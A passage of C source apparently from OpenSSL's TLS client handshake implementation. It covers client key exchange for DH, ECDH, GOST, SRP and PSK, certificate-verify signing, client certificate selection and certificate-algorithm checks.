memcpy(p, epms, outl);
p+=outl;
n+=outl + 2;
s->session->master_key_length=
s->method->ssl3_enc->generate_master_secret(s,
s->session->master_key,
tmp_buf, sizeof tmp_buf);
OPENSSL_cleanse(tmp_buf, sizeof tmp_buf);
OPENSSL_cleanse(epms, outl);
}
#endif
#ifndef OPENSSL_NO_DH
else if (alg_k & (SSL_kDHE|SSL_kDHr|SSL_kDHd))
{
DH *dh_srvr,*dh_clnt;
SESS_CERT *scert = s->session->sess_cert;
if (scert == NULL)
{
ssl3_send_alert(s,SSL3_AL_FATAL,SSL_AD_UNEXPECTED_MESSAGE);
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,SSL_R_UNEXPECTED_MESSAGE);
goto err;
}
if (scert->peer_dh_tmp != NULL)
dh_srvr=scert->peer_dh_tmp;
else
{
/* we get them from the cert */
int idx = scert->peer_cert_type;
EVP_PKEY *spkey = NULL;
dh_srvr = NULL;
if (idx >= 0)
spkey = X509_get_pubkey(
scert->peer_pkeys[idx].x509);
if (spkey)
{
dh_srvr = EVP_PKEY_get1_DH(spkey);
EVP_PKEY_free(spkey);
}
if (dh_srvr == NULL)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
ERR_R_INTERNAL_ERROR);
goto err;
}
}
if (s->s3->flags & TLS1_FLAGS_SKIP_CERT_VERIFY)
{
/* Use client certificate key */
EVP_PKEY *clkey = s->cert->key->privatekey;
dh_clnt = NULL;
if (clkey)
dh_clnt = EVP_PKEY_get1_DH(clkey);
if (dh_clnt == NULL)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
ERR_R_INTERNAL_ERROR);
goto err;
}
}
else
{
/* generate a new random key */
if ((dh_clnt=DHparams_dup(dh_srvr)) == NULL)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,ERR_R_DH_LIB);
goto err;
}
if (!DH_generate_key(dh_clnt))
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,ERR_R_DH_LIB);
DH_free(dh_clnt);
goto err;
}
}
/* use the 'p' output buffer for the DH key, but
* make sure to clear it out afterwards */
n=DH_compute_key(p,dh_srvr->pub_key,dh_clnt);
if (scert->peer_dh_tmp == NULL)
DH_free(dh_srvr);
if (n <= 0)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,ERR_R_DH_LIB);
DH_free(dh_clnt);
goto err;
}
/* generate master key from the result */
s->session->master_key_length=
s->method->ssl3_enc->generate_master_secret(s,
s->session->master_key,p,n);
/* clean up */
memset(p,0,n);
if (s->s3->flags & TLS1_FLAGS_SKIP_CERT_VERIFY)
n = 0;
else
{
/* send off the data */
n=BN_num_bytes(dh_clnt->pub_key);
s2n(n,p);
BN_bn2bin(dh_clnt->pub_key,p);
n+=2;
}
DH_free(dh_clnt);
/* perhaps clean things up a bit EAY EAY EAY EAY*/
}
#endif
#ifndef OPENSSL_NO_ECDH
else if (alg_k & (SSL_kECDHE|SSL_kECDHr|SSL_kECDHe))
{
const EC_GROUP *srvr_group = NULL;
EC_KEY *tkey;
int ecdh_clnt_cert = 0;
int field_size = 0;
if (s->session->sess_cert == NULL)
{
ssl3_send_alert(s,SSL3_AL_FATAL,SSL_AD_UNEXPECTED_MESSAGE);
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,SSL_R_UNEXPECTED_MESSAGE);
goto err;
}
/* Did we send out the client's
* ECDH share for use in premaster
* computation as part of client certificate?
* If so, set ecdh_clnt_cert to 1.
*/
if ((alg_k & (SSL_kECDHr|SSL_kECDHe)) && (s->cert != NULL))
{
/*-
* XXX: For now, we do not support client
* authentication using ECDH certificates.
* To add such support, one needs to add
* code that checks for appropriate
* conditions and sets ecdh_clnt_cert to 1.
* For example, the cert have an ECC
* key on the same curve as the server's
* and the key should be authorized for
* key agreement.
*
* One also needs to add code in ssl3_connect
* to skip sending the certificate verify
* message.
*
* if ((s->cert->key->privatekey != NULL) &&
* (s->cert->key->privatekey->type ==
* EVP_PKEY_EC) && ...)
* ecdh_clnt_cert = 1;
*/
}
if (s->session->sess_cert->peer_ecdh_tmp != NULL)
{
tkey = s->session->sess_cert->peer_ecdh_tmp;
}
else
{
/* Get the Server Public Key from Cert */
srvr_pub_pkey = X509_get_pubkey(s->session-> \
sess_cert->peer_pkeys[SSL_PKEY_ECC].x509);
if ((srvr_pub_pkey == NULL) ||
(srvr_pub_pkey->type != EVP_PKEY_EC) ||
(srvr_pub_pkey->pkey.ec == NULL))
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
ERR_R_INTERNAL_ERROR);
goto err;
}
tkey = srvr_pub_pkey->pkey.ec;
}
srvr_group = EC_KEY_get0_group(tkey);
srvr_ecpoint = EC_KEY_get0_public_key(tkey);
if ((srvr_group == NULL) || (srvr_ecpoint == NULL))
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
ERR_R_INTERNAL_ERROR);
goto err;
}
if ((clnt_ecdh=EC_KEY_new()) == NULL)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,ERR_R_MALLOC_FAILURE);
goto err;
}
if (!EC_KEY_set_group(clnt_ecdh, srvr_group))
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,ERR_R_EC_LIB);
goto err;
}
if (ecdh_clnt_cert)
{
/* Reuse key info from our certificate
* We only need our private key to perform
* the ECDH computation.
*/
const BIGNUM *priv_key;
tkey = s->cert->key->privatekey->pkey.ec;
priv_key = EC_KEY_get0_private_key(tkey);
if (priv_key == NULL)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,ERR_R_MALLOC_FAILURE);
goto err;
}
if (!EC_KEY_set_private_key(clnt_ecdh, priv_key))
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,ERR_R_EC_LIB);
goto err;
}
}
else
{
/* Generate a new ECDH key pair */
if (!(EC_KEY_generate_key(clnt_ecdh)))
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE, ERR_R_ECDH_LIB);
goto err;
}
}
/* use the 'p' output buffer for the ECDH key, but
* make sure to clear it out afterwards
*/
field_size = EC_GROUP_get_degree(srvr_group);
if (field_size <= 0)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
ERR_R_ECDH_LIB);
goto err;
}
n=ECDH_compute_key(p, (field_size+7)/8, srvr_ecpoint, clnt_ecdh, NULL);
if (n <= 0)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
ERR_R_ECDH_LIB);
goto err;
}
/* generate master key from the result */
s->session->master_key_length = s->method->ssl3_enc \
-> generate_master_secret(s,
s->session->master_key,
p, n);
memset(p, 0, n); /* clean up */
if (ecdh_clnt_cert)
{
/* Send empty client key exch message */
n = 0;
}
else
{
/* First check the size of encoding and
* allocate memory accordingly.
*/
encoded_pt_len =
EC_POINT_point2oct(srvr_group,
EC_KEY_get0_public_key(clnt_ecdh),
POINT_CONVERSION_UNCOMPRESSED,
NULL, 0, NULL);
encodedPoint = (unsigned char *)
OPENSSL_malloc(encoded_pt_len *
sizeof(unsigned char));
bn_ctx = BN_CTX_new();
if ((encodedPoint == NULL) ||
(bn_ctx == NULL))
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,ERR_R_MALLOC_FAILURE);
goto err;
}
/* Encode the public key */
n = EC_POINT_point2oct(srvr_group,
EC_KEY_get0_public_key(clnt_ecdh),
POINT_CONVERSION_UNCOMPRESSED,
encodedPoint, encoded_pt_len, bn_ctx);
*p = n; /* length of encoded point */
/* Encoded point will be copied here */
p += 1;
/* copy the point */
memcpy((unsigned char *)p, encodedPoint, n);
/* increment n to account for length field */
n += 1;
}
/* Free allocated memory */
BN_CTX_free(bn_ctx);
if (encodedPoint != NULL) OPENSSL_free(encodedPoint);
if (clnt_ecdh != NULL)
EC_KEY_free(clnt_ecdh);
EVP_PKEY_free(srvr_pub_pkey);
}
#endif /* !OPENSSL_NO_ECDH */
else if (alg_k & SSL_kGOST)
{
/* GOST key exchange message creation */
EVP_PKEY_CTX *pkey_ctx;
X509 *peer_cert;
size_t msglen;
unsigned int md_len;
int keytype;
unsigned char premaster_secret[32],shared_ukm[32], tmp[256];
EVP_MD_CTX *ukm_hash;
EVP_PKEY *pub_key;
/* Get server sertificate PKEY and create ctx from it */
peer_cert=s->session->sess_cert->peer_pkeys[(keytype=SSL_PKEY_GOST01)].x509;
if (!peer_cert)
peer_cert=s->session->sess_cert->peer_pkeys[(keytype=SSL_PKEY_GOST94)].x509;
if (!peer_cert) {
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,SSL_R_NO_GOST_CERTIFICATE_SENT_BY_PEER);
goto err;
}
pkey_ctx=EVP_PKEY_CTX_new(pub_key=X509_get_pubkey(peer_cert),NULL);
/* If we have send a certificate, and certificate key
* parameters match those of server certificate, use
* certificate key for key exchange
*/
/* Otherwise, generate ephemeral key pair */
EVP_PKEY_encrypt_init(pkey_ctx);
/* Generate session key */
RAND_bytes(premaster_secret,32);
/* If we have client certificate, use its secret as peer key */
if (s->s3->tmp.cert_req && s->cert->key->privatekey) {
if (EVP_PKEY_derive_set_peer(pkey_ctx,s->cert->key->privatekey) <=0) {
/* If there was an error - just ignore it. Ephemeral key
* would be used
*/
ERR_clear_error();
}
}
/* Compute shared IV and store it in algorithm-specific
* context data */
ukm_hash = EVP_MD_CTX_create();
EVP_DigestInit(ukm_hash,EVP_get_digestbynid(NID_id_GostR3411_94));
EVP_DigestUpdate(ukm_hash,s->s3->client_random,SSL3_RANDOM_SIZE);
EVP_DigestUpdate(ukm_hash,s->s3->server_random,SSL3_RANDOM_SIZE);
EVP_DigestFinal_ex(ukm_hash, shared_ukm, &md_len);
EVP_MD_CTX_destroy(ukm_hash);
if (EVP_PKEY_CTX_ctrl(pkey_ctx,-1,EVP_PKEY_OP_ENCRYPT,EVP_PKEY_CTRL_SET_IV,
8,shared_ukm)<0) {
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
SSL_R_LIBRARY_BUG);
goto err;
}
/* Make GOST keytransport blob message */
/*Encapsulate it into sequence */
*(p++)=V_ASN1_SEQUENCE | V_ASN1_CONSTRUCTED;
msglen=255;
if (EVP_PKEY_encrypt(pkey_ctx,tmp,&msglen,premaster_secret,32)<0) {
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
SSL_R_LIBRARY_BUG);
goto err;
}
if (msglen >= 0x80)
{
*(p++)=0x81;
*(p++)= msglen & 0xff;
n=msglen+3;
}
else
{
*(p++)= msglen & 0xff;
n=msglen+2;
}
memcpy(p, tmp, msglen);
/* Check if pubkey from client certificate was used */
if (EVP_PKEY_CTX_ctrl(pkey_ctx, -1, -1, EVP_PKEY_CTRL_PEER_KEY, 2, NULL) > 0)
{
/* Set flag "skip certificate verify" */
s->s3->flags |= TLS1_FLAGS_SKIP_CERT_VERIFY;
}
EVP_PKEY_CTX_free(pkey_ctx);
s->session->master_key_length=
s->method->ssl3_enc->generate_master_secret(s,
s->session->master_key,premaster_secret,32);
EVP_PKEY_free(pub_key);
}
#ifndef OPENSSL_NO_SRP
else if (alg_k & SSL_kSRP)
{
if (s->srp_ctx.A != NULL)
{
/* send off the data */
n=BN_num_bytes(s->srp_ctx.A);
s2n(n,p);
BN_bn2bin(s->srp_ctx.A,p);
n+=2;
}
else
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,ERR_R_INTERNAL_ERROR);
goto err;
}
if (s->session->srp_username != NULL)
OPENSSL_free(s->session->srp_username);
s->session->srp_username = BUF_strdup(s->srp_ctx.login);
if (s->session->srp_username == NULL)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
ERR_R_MALLOC_FAILURE);
goto err;
}
if ((s->session->master_key_length = SRP_generate_client_master_secret(s,s->session->master_key))<0)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,ERR_R_INTERNAL_ERROR);
goto err;
}
}
#endif
#ifndef OPENSSL_NO_PSK
else if (alg_k & SSL_kPSK)
{
/* The callback needs PSK_MAX_IDENTITY_LEN + 1 bytes
* to return a \0-terminated identity. The last byte
* is for us for simulating strnlen. */
char identity[PSK_MAX_IDENTITY_LEN + 2];
size_t identity_len;
unsigned char *t = NULL;
unsigned char psk_or_pre_ms[PSK_MAX_PSK_LEN*2+4];
unsigned int pre_ms_len = 0, psk_len = 0;
int psk_err = 1;
n = 0;
if (s->psk_client_callback == NULL)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
SSL_R_PSK_NO_CLIENT_CB);
goto err;
}
memset(identity, 0, sizeof(identity));
psk_len = s->psk_client_callback(s, s->ctx->psk_identity_hint,
identity, sizeof(identity) - 1,
psk_or_pre_ms, sizeof(psk_or_pre_ms));
if (psk_len > PSK_MAX_PSK_LEN)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
ERR_R_INTERNAL_ERROR);
goto psk_err;
}
else if (psk_len == 0)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
SSL_R_PSK_IDENTITY_NOT_FOUND);
goto psk_err;
}
identity[PSK_MAX_IDENTITY_LEN + 1] = '\0';
identity_len = strlen(identity);
if (identity_len > PSK_MAX_IDENTITY_LEN)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
ERR_R_INTERNAL_ERROR);
goto psk_err;
}
/* create PSK pre_master_secret */
pre_ms_len = 2+psk_len+2+psk_len;
t = psk_or_pre_ms;
memmove(psk_or_pre_ms+psk_len+4, psk_or_pre_ms, psk_len);
s2n(psk_len, t);
memset(t, 0, psk_len);
t+=psk_len;
s2n(psk_len, t);
if (s->session->psk_identity_hint != NULL)
OPENSSL_free(s->session->psk_identity_hint);
s->session->psk_identity_hint = BUF_strdup(s->ctx->psk_identity_hint);
if (s->ctx->psk_identity_hint != NULL &&
s->session->psk_identity_hint == NULL)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
ERR_R_MALLOC_FAILURE);
goto psk_err;
}
if (s->session->psk_identity != NULL)
OPENSSL_free(s->session->psk_identity);
s->session->psk_identity = BUF_strdup(identity);
if (s->session->psk_identity == NULL)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
ERR_R_MALLOC_FAILURE);
goto psk_err;
}
s->session->master_key_length =
s->method->ssl3_enc->generate_master_secret(s,
s->session->master_key,
psk_or_pre_ms, pre_ms_len);
s2n(identity_len, p);
memcpy(p, identity, identity_len);
n = 2 + identity_len;
psk_err = 0;
psk_err:
OPENSSL_cleanse(identity, sizeof(identity));
OPENSSL_cleanse(psk_or_pre_ms, sizeof(psk_or_pre_ms));
if (psk_err != 0)
{
ssl3_send_alert(s, SSL3_AL_FATAL, SSL_AD_HANDSHAKE_FAILURE);
goto err;
}
}
#endif
else
{
ssl3_send_alert(s, SSL3_AL_FATAL,
SSL_AD_HANDSHAKE_FAILURE);
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
ERR_R_INTERNAL_ERROR);
goto err;
}
ssl_set_handshake_header(s, SSL3_MT_CLIENT_KEY_EXCHANGE, n);
s->state=SSL3_ST_CW_KEY_EXCH_B;
}
/* SSL3_ST_CW_KEY_EXCH_B */
return ssl_do_write(s);
err:
#ifndef OPENSSL_NO_ECDH
BN_CTX_free(bn_ctx);
if (encodedPoint != NULL) OPENSSL_free(encodedPoint);
if (clnt_ecdh != NULL)
EC_KEY_free(clnt_ecdh);
EVP_PKEY_free(srvr_pub_pkey);
#endif
return(-1);
}
int ssl3_send_client_verify(SSL *s)
{
unsigned char *p;
unsigned char data[MD5_DIGEST_LENGTH+SHA_DIGEST_LENGTH];
EVP_PKEY *pkey;
EVP_PKEY_CTX *pctx=NULL;
EVP_MD_CTX mctx;
unsigned u=0;
unsigned long n;
int j;
EVP_MD_CTX_init(&mctx);
if (s->state == SSL3_ST_CW_CERT_VRFY_A)
{
p= ssl_handshake_start(s);
pkey=s->cert->key->privatekey;
/* Create context from key and test if sha1 is allowed as digest */
pctx = EVP_PKEY_CTX_new(pkey,NULL);
EVP_PKEY_sign_init(pctx);
if (EVP_PKEY_CTX_set_signature_md(pctx, EVP_sha1())>0)
{
if (!SSL_USE_SIGALGS(s))
s->method->ssl3_enc->cert_verify_mac(s,
NID_sha1,
&(data[MD5_DIGEST_LENGTH]));
}
else
{
ERR_clear_error();
}
/* For TLS v1.2 send signature algorithm and signature
* using agreed digest and cached handshake records.
*/
if (SSL_USE_SIGALGS(s))
{
long hdatalen = 0;
void *hdata;
const EVP_MD *md = s->cert->key->digest;
hdatalen = BIO_get_mem_data(s->s3->handshake_buffer,
&hdata);
if (hdatalen <= 0 || !tls12_get_sigandhash(p, pkey, md))
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_VERIFY,
ERR_R_INTERNAL_ERROR);
goto err;
}
p += 2;
#ifdef SSL_DEBUG
fprintf(stderr, "Using TLS 1.2 with client alg %s\n",
EVP_MD_name(md));
#endif
if (!EVP_SignInit_ex(&mctx, md, NULL)
|| !EVP_SignUpdate(&mctx, hdata, hdatalen)
|| !EVP_SignFinal(&mctx, p + 2, &u, pkey))
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_VERIFY,
ERR_R_EVP_LIB);
goto err;
}
s2n(u,p);
n = u + 4;
if (!ssl3_digest_cached_records(s))
goto err;
}
else
#ifndef OPENSSL_NO_RSA
if (pkey->type == EVP_PKEY_RSA)
{
s->method->ssl3_enc->cert_verify_mac(s,
NID_md5,
&(data[0]));
if (RSA_sign(NID_md5_sha1, data,
MD5_DIGEST_LENGTH+SHA_DIGEST_LENGTH,
&(p[2]), &u, pkey->pkey.rsa) <= 0 )
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_VERIFY,ERR_R_RSA_LIB);
goto err;
}
s2n(u,p);
n=u+2;
}
else
#endif
#ifndef OPENSSL_NO_DSA
if (pkey->type == EVP_PKEY_DSA)
{
if (!DSA_sign(pkey->save_type,
&(data[MD5_DIGEST_LENGTH]),
SHA_DIGEST_LENGTH,&(p[2]),
(unsigned int *)&j,pkey->pkey.dsa))
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_VERIFY,ERR_R_DSA_LIB);
goto err;
}
s2n(j,p);
n=j+2;
}
else
#endif
#ifndef OPENSSL_NO_ECDSA
if (pkey->type == EVP_PKEY_EC)
{
if (!ECDSA_sign(pkey->save_type,
&(data[MD5_DIGEST_LENGTH]),
SHA_DIGEST_LENGTH,&(p[2]),
(unsigned int *)&j,pkey->pkey.ec))
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_VERIFY,
ERR_R_ECDSA_LIB);
goto err;
}
s2n(j,p);
n=j+2;
}
else
#endif
if (pkey->type == NID_id_GostR3410_94 || pkey->type == NID_id_GostR3410_2001)
{
unsigned char signbuf[64];
int i;
size_t sigsize=64;
s->method->ssl3_enc->cert_verify_mac(s,
NID_id_GostR3411_94,
data);
if (EVP_PKEY_sign(pctx, signbuf, &sigsize, data, 32) <= 0) {
SSLerr(SSL_F_SSL3_SEND_CLIENT_VERIFY,
ERR_R_INTERNAL_ERROR);
goto err;
}
for (i=63,j=0; i>=0; j++, i--) {
p[2+j]=signbuf[i];
}
s2n(j,p);
n=j+2;
}
else
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_VERIFY,ERR_R_INTERNAL_ERROR);
goto err;
}
ssl_set_handshake_header(s, SSL3_MT_CERTIFICATE_VERIFY, n);
s->state=SSL3_ST_CW_CERT_VRFY_B;
}
EVP_MD_CTX_cleanup(&mctx);
EVP_PKEY_CTX_free(pctx);
return ssl_do_write(s);
err:
EVP_MD_CTX_cleanup(&mctx);
EVP_PKEY_CTX_free(pctx);
return(-1);
}
/* Check a certificate can be used for client authentication. Currently
* check cert exists, if we have a suitable digest for TLS 1.2 if
* static DH client certificates can be used and optionally checks
* suitability for Suite B.
*/
static int ssl3_check_client_certificate(SSL *s)
{
unsigned long alg_k;
if (!s->cert || !s->cert->key->x509 || !s->cert->key->privatekey)
return 0;
/* If no suitable signature algorithm can't use certificate */
if (SSL_USE_SIGALGS(s) && !s->cert->key->digest)
return 0;
/* If strict mode check suitability of chain before using it.
* This also adjusts suite B digest if necessary.
*/
if (s->cert->cert_flags & SSL_CERT_FLAGS_CHECK_TLS_STRICT &&
!tls1_check_chain(s, NULL, NULL, NULL, -2))
return 0;
alg_k=s->s3->tmp.new_cipher->algorithm_mkey;
/* See if we can use client certificate for fixed DH */
if (alg_k & (SSL_kDHr|SSL_kDHd))
{
SESS_CERT *scert = s->session->sess_cert;
int i = scert->peer_cert_type;
EVP_PKEY *clkey = NULL, *spkey = NULL;
clkey = s->cert->key->privatekey;
/* If client key not DH assume it can be used */
if (EVP_PKEY_id(clkey) != EVP_PKEY_DH)
return 1;
if (i >= 0)
spkey = X509_get_pubkey(scert->peer_pkeys[i].x509);
if (spkey)
{
/* Compare server and client parameters */
i = EVP_PKEY_cmp_parameters(clkey, spkey);
EVP_PKEY_free(spkey);
if (i != 1)
return 0;
}
s->s3->flags |= TLS1_FLAGS_SKIP_CERT_VERIFY;
}
return 1;
}
int ssl3_send_client_certificate(SSL *s)
{
X509 *x509=NULL;
EVP_PKEY *pkey=NULL;
int i;
if (s->state == SSL3_ST_CW_CERT_A)
{
/* Let cert callback update client certificates if required */
if (s->cert->cert_cb)
{
i = s->cert->cert_cb(s, s->cert->cert_cb_arg);
if (i < 0)
{
s->rwstate=SSL_X509_LOOKUP;
return -1;
}
if (i == 0)
{
ssl3_send_alert(s,SSL3_AL_FATAL,SSL_AD_INTERNAL_ERROR);
return 0;
}
s->rwstate=SSL_NOTHING;
}
if (ssl3_check_client_certificate(s))
s->state=SSL3_ST_CW_CERT_C;
else
s->state=SSL3_ST_CW_CERT_B;
}
/* We need to get a client cert */
if (s->state == SSL3_ST_CW_CERT_B)
{
/* If we get an error, we need to
* ssl->rwstate=SSL_X509_LOOKUP; return(-1);
* We then get retied later */
i=0;
i = ssl_do_client_cert_cb(s, &x509, &pkey);
if (i < 0)
{
s->rwstate=SSL_X509_LOOKUP;
return(-1);
}
s->rwstate=SSL_NOTHING;
if ((i == 1) && (pkey != NULL) && (x509 != NULL))
{
s->state=SSL3_ST_CW_CERT_B;
if ( !SSL_use_certificate(s,x509) ||
!SSL_use_PrivateKey(s,pkey))
i=0;
}
else if (i == 1)
{
i=0;
SSLerr(SSL_F_SSL3_SEND_CLIENT_CERTIFICATE,SSL_R_BAD_DATA_RETURNED_BY_CALLBACK);
}
if (x509 != NULL) X509_free(x509);
if (pkey != NULL) EVP_PKEY_free(pkey);
if (i && !ssl3_check_client_certificate(s))
i = 0;
if (i == 0)
{
if (s->version == SSL3_VERSION)
{
s->s3->tmp.cert_req=0;
ssl3_send_alert(s,SSL3_AL_WARNING,SSL_AD_NO_CERTIFICATE);
return(1);
}
else
{
s->s3->tmp.cert_req=2;
}
}
/* Ok, we have a cert */
s->state=SSL3_ST_CW_CERT_C;
}
if (s->state == SSL3_ST_CW_CERT_C)
{
s->state=SSL3_ST_CW_CERT_D;
if (!ssl3_output_cert_chain(s,
(s->s3->tmp.cert_req == 2)?NULL:s->cert->key))
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_CERTIFICATE, ERR_R_INTERNAL_ERROR);
ssl3_send_alert(s,SSL3_AL_FATAL,SSL_AD_INTERNAL_ERROR);
return 0;
}
}
/* SSL3_ST_CW_CERT_D */
return ssl_do_write(s);
}
#define has_bits(i,m) (((i)&(m)) == (m))
int ssl3_check_cert_and_algorithm(SSL *s)
{
int i,idx;
long alg_k,alg_a;
EVP_PKEY *pkey=NULL;
SESS_CERT *sc;
#ifndef OPENSSL_NO_RSA
RSA *rsa;
#endif
#ifndef OPENSSL_NO_DH
DH *dh;
#endif
alg_k=s->s3->tmp.new_cipher->algorithm_mkey;
alg_a=s->s3->tmp.new_cipher->algorithm_auth;
/* we don't have a certificate */
if ((alg_a & (SSL_aNULL|SSL_aKRB5)) || (alg_k & SSL_kPSK))
return(1);
sc=s->session->sess_cert;
if (sc == NULL)
{
SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,ERR_R_INTERNAL_ERROR);
goto err;
}
#ifndef OPENSSL_NO_RSA
rsa=s->session->sess_cert->peer_rsa_tmp;
#endif
#ifndef OPENSSL_NO_DH
dh=s->session->sess_cert->peer_dh_tmp;
#endif
/* This is the passed certificate */
idx=sc->peer_cert_type;
#ifndef OPENSSL_NO_ECDH
if (idx == SSL_PKEY_ECC)
{
if (ssl_check_srvr_ecc_cert_and_alg(sc->peer_pkeys[idx].x509,
s) == 0)
{ /* check failed */
SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,SSL_R_BAD_ECC_CERT);
goto f_err;
}
else
{
return 1;
}
}
else if (alg_a & SSL_aECDSA)
{
SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,SSL_R_MISSING_ECDSA_SIGNING_CERT);
goto f_err;
}
else if (alg_k & (SSL_kECDHr|SSL_kECDHe))
{
SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,SSL_R_MISSING_ECDH_CERT);
goto f_err;
}
#endif
pkey=X509_get_pubkey(sc->peer_pkeys[idx].x509);
i=X509_certificate_type(sc->peer_pkeys[idx].x509,pkey);
EVP_PKEY_free(pkey);
/* Check that we have a certificate if we require one */
if ((alg_a & SSL_aRSA) && !has_bits(i,EVP_PK_RSA|EVP_PKT_SIGN))
{
SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,SSL_R_MISSING_RSA_SIGNING_CERT);
goto f_err;
}
#ifndef OPENSSL_NO_DSA
else if ((alg_a & SSL_aDSS) && !has_bits(i,EVP_PK_DSA|EVP_PKT_SIGN))
{
SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,SSL_R_MISSING_DSA_SIGNING_CERT);
goto f_err;
}
#endif
#ifndef OPENSSL_NO_RSA
if ((alg_k & SSL_kRSA) &&
!(has_bits(i,EVP_PK_RSA|EVP_PKT_ENC) || (rsa != NULL)))
{
SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,SSL_R_MISSING_RSA_ENCRYPTING_CERT);
goto f_err;
}
#endif
#ifndef OPENSSL_NO_DH
if ((alg_k & SSL_kDHE) &&
!(has_bits(i,EVP_PK_DH|EVP_PKT_EXCH) || (dh != NULL)))
{
SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,SSL_R_MISSING_DH_KEY);
goto f_err;
}
else if ((alg_k & SSL_kDHr) && !SSL_USE_SIGALGS(s) &&
!has_bits(i,EVP_PK_DH|EVP_PKS_RSA))
{
SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,SSL_R_MISSING_DH_RSA_CERT);
goto f_err;
}
#ifndef OPENSSL_NO_DSA
else if ((alg_k & SSL_kDHd) && !SSL_USE_SIGALGS(s) &&
!has_bits(i,EVP_PK_DH|EVP_PKS_DSA))
{
SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,SSL_R_MISSING_DH_DSA_CERT);
goto f_err;
}
#endif
#endif
if (SSL_C_IS_EXPORT(s->s3->tmp.new_cipher) && !has_bits(i,EVP_PKT_EXP))
{
#ifndef OPENSSL_NO_RSA
if (alg_k & SSL_kRSA)
{
if (rsa == NULL
|| RSA_size(rsa)*8 > SSL_C_EXPORT_PKEYLENGTH(s->s3->tmp.new_cipher))
{
SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,SSL_R_MISSING_EXPORT_TMP_RSA_KEY);
goto f_err;
}
}
else
#endif
#ifndef OPENSSL_NO_DH
if (alg_k & (SSL_kDHE|SSL_kDHr|SSL_kDHd))
{
if (dh == NULL
|| DH_size(dh)*8 > SSL_C_EXPORT_PKEYLENGTH(s->s3->tmp.new_cipher))
{
SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,SSL_R_MISSING_EXPORT_TMP_DH_KEY);
goto f_err;
}
}
else
#endif
{
SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,SSL_R_UNKNOWN_KEY_EXCHANGE_TYPE);
goto f_err;
}
}
return(1);
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,SSL_AD_HANDSHAKE_FAILURE);
err:
return(0);
}
/* Check to see if handshake is full or resumed. Usually this is just a
* case of checking to see if a cache hit has occurred. In the case of
* session tickets we have to check the next message to be sure.
*/
#ifndef OPENSSL_NO_TLSEXT
# ifndef OPENSSL_NO_NEXTPROTONEG
int ssl3_send_next_proto(SSL *s)
{
unsigned int len, padding_len;
unsigned char *d;
if (s->state == SSL3_ST_CW_NEXT_PROTO_A)
{
len = s->next_proto_negotiated_len;
padding_len = 32 - ((len + 2) % 32);
d = (unsigned char *)s->init_buf->data;
d[4] = len;
memcpy(d + 5, s->next_proto_negotiated, len);
d[5 + len] = padding_len;
memset(d + 6 + len, 0, padding_len);
*(d++)=SSL3_MT_NEXT_PROTO;
l2n3(2 + len + padding_len, d);
s->state = SSL3_ST_CW_NEXT_PROTO_B;
s->init_num = 4 + 2 + len + padding_len;
s->init_off = 0;
}
return ssl3_do_write(s, SSL3_RT_HANDSHAKE);
}
# endif
#endif
int ssl_do_client_cert_cb(SSL *s, X509 **px509, EVP_PKEY **ppkey)
{
int i = 0;
